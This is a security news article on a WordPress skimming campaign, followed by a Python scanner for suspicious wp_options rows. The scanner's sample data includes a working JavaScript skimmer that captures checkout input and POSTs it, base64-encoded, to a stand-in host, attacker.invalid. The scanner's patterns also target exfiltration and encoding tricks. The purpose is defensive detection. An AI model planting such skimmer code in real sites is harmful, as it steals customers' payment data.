Researchers Warn Of Stealthy Malware Stealing Payment Information From WordPress Sites
Cybersecurity researchers at Sucuri are alerting website owners to a new credit card skimming campaign targeting WordPress e-commerce sites.
In a Rush? Here are the Quick Facts!
- Malware injects malicious JavaScript into WordPress database to steal payment details during checkout.
- It activates on checkout pages and captures data like credit card numbers and CVV codes.
- Stolen data is encrypted and sent to remote servers controlled by attackers.
This attack, known as a credit card skimmer campaign, is designed to secretly steal payment information from customers. The malware operates in the background, injecting malicious code into a WordPress website’s database and compromising checkout pages where customers enter their payment details.
The malware is particularly sneaky because it does not rely on infecting theme files or plugins, which file-based scanners routinely check. Instead, it hides inside the database, where a file-integrity scan never looks, making it harder to detect.
Specifically, the malicious code is embedded in the “wp_options” table, which stores the site’s settings and the contents of its widgets, as noted by Sucuri. Because nothing changes on disk, the code avoids detection by common file-based security tools and remains on infected sites undisturbed.
Once the malware is activated, it targets the checkout page, where users enter their credit card numbers, expiration dates, and CVV codes. The malicious code checks the page URL for the string “checkout” so that it runs only on the payment page and is not triggered on other parts of the site, which also keeps it out of sight during casual browsing.
It either adds a fake payment form or hijacks the existing one, making it appear as if users are entering their details on a legitimate payment processor’s form, such as Stripe.
As customers input their credit card information, the malware captures it in real time. To make the stolen data harder to detect, the malware scrambles the information using encoding and encryption techniques, then sends it to remote servers controlled by the attacker.
This process is done quietly and without disrupting the checkout process, so customers notice nothing unusual while completing their purchases. The stolen data is then sold on underground markets or used for fraudulent transactions, putting both customers and businesses at risk.
The researchers say that website owners can protect themselves by regularly checking for suspicious code in the WordPress admin panel, specifically under the “Widgets” section, since widget contents are stored in the wp_options table where this campaign hides its payload. They should look for unfamiliar JavaScript, in particular script tags, references to “checkout”, or encoded strings, that could indicate the presence of malware. Reviewing the wp_options table directly is a useful complement, as a widget can be hidden from the admin screen while its stored content still executes.
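The following scanner is an added example, not code from Sucuri or the article, that turns the indicators described above (a script tag stored in an option value, a gate on the word “checkout”, a hook on form input, encoding helpers such as atob/btoa, and an exfiltration call to a remote host) into a check you can run over a dump of wp_options rows. The indicator names, the scoring rule, the `attacker.invalid` host and the sample rows are all my own constructions; the serialized-widget helper only approximates how WordPress stores a block widget.

```python
import base64
import re
from dataclasses import dataclass, field

# Indicator patterns keyed to the behaviour described in the article. The
# indicator names are my own, not Sucuri's.
INDICATORS = {
    "script_tag": re.compile(r"<script\b", re.I),
    "checkout_gate": re.compile(r"\bcheckout\b", re.I),
    "form_tamper": re.compile(
        r"createElement\s*\(\s*['\"](?:form|input|iframe)['\"]"
        r"|addEventListener\s*\(\s*['\"](?:input|keyup|change|submit)['\"]", re.I),
    "encoding": re.compile(r"\b(?:atob|btoa|unescape|fromCharCode|CryptoJS)\b"),
    "exfil": re.compile(r"\b(?:fetch|XMLHttpRequest|sendBeacon)\b|new\s+Image\s*\("),
    "remote_url": re.compile(r"https?://[^\s'\"<>]+"),
}

# A run of base64 text long enough to hide a URL or a second-stage script.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_base64_runs(text):
    """Return printable strings recovered from base64 runs inside text."""
    found = []
    for m in B64_RUN.finditer(text):
        try:
            decoded = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except ValueError:  # not base64, bad padding, or not UTF-8
            continue
        if decoded.isprintable():
            found.append(decoded)
    return found


@dataclass
class Finding:
    option_name: str
    hits: dict = field(default_factory=dict)     # indicator -> first matched snippet
    decoded: list = field(default_factory=list)  # strings recovered from base64
    suspicious: bool = False


def scan_option(option_name, option_value):
    """Scan one wp_options row; serialized PHP is scanned as opaque text."""
    finding = Finding(option_name)
    finding.decoded = decode_base64_runs(option_value)
    haystack = option_value + "\n" + "\n".join(finding.decoded)
    for key, pattern in INDICATORS.items():
        m = pattern.search(haystack)
        if m:
            finding.hits[key] = m.group(0)[:60]
    h = finding.hits
    # A URL or the word "checkout" on its own is normal for a shop. The
    # combination of executable markup, a checkout gate or form hook, and a
    # way to encode or ship data is what the skimmer needs, so that is the rule.
    finding.suspicious = (
        "script_tag" in h
        and ("checkout_gate" in h or "form_tamper" in h)
        and ("encoding" in h or "exfil" in h or "remote_url" in h)
    )
    return finding


def scan_options(rows):
    """rows: iterable of (option_name, option_value) pairs. Returns all findings."""
    return [scan_option(name, value) for name, value in rows]


def suspicious_options(rows):
    return [f.option_name for f in scan_options(rows) if f.suspicious]


def php_serialized_widget(content):
    """Approximate the PHP-serialized array WordPress keeps for one block widget."""
    raw = content.encode()
    return (f'a:2:{{i:2;a:1:{{s:7:"content";s:{len(raw)}:"{content}";}}'
            f's:12:"_multiwidget";i:1;}}')


# Constructed sample rows standing in for SELECT option_name, option_value
# FROM wp_options. The exfiltration host uses the reserved .invalid TLD.
_EXFIL_URL = "https://attacker.invalid/collect"
_SKIMMER_HTML = (
    '<p>Secure checkout</p><script>'
    'if(location.href.indexOf("checkout")!==-1){'
    'var u=atob("' + base64.b64encode(_EXFIL_URL.encode()).decode() + '");'
    'document.addEventListener("input",function(e){'
    'fetch(u,{method:"POST",body:btoa(e.target.name+"="+e.target.value)});});}'
    '</script>'
)
SAMPLE_ROWS = [
    ("siteurl", "https://shop.example"),
    ("woocommerce_checkout_privacy_policy_text",
     "Your personal data will be used to process your order at checkout."),
    ("widget_text", php_serialized_widget("<p>Free shipping on orders over $50.</p>")),
    ("widget_block", php_serialized_widget(_SKIMMER_HTML)),
]

if __name__ == "__main__":
    for f in scan_options(SAMPLE_ROWS):
        flag = "SUSPICIOUS" if f.suspicious else "ok"
        print(f"{flag:10} {f.option_name}: {sorted(f.hits)} decoded={f.decoded}")
```

On the sample rows only `widget_block` is flagged: `siteurl` carries a URL and the WooCommerce privacy text mentions checkout, but neither contains a script tag, which is the false-positive case a shop will hit constantly. Decoding base64 runs before matching is what surfaces the hidden exfiltration URL; a scanner that only matches the raw value would miss it. To run this against a live site, feed it rows exported with WP-CLI (`wp db query`) or a SQL client, adjusting the table prefix if the site does not use the default `wp_`.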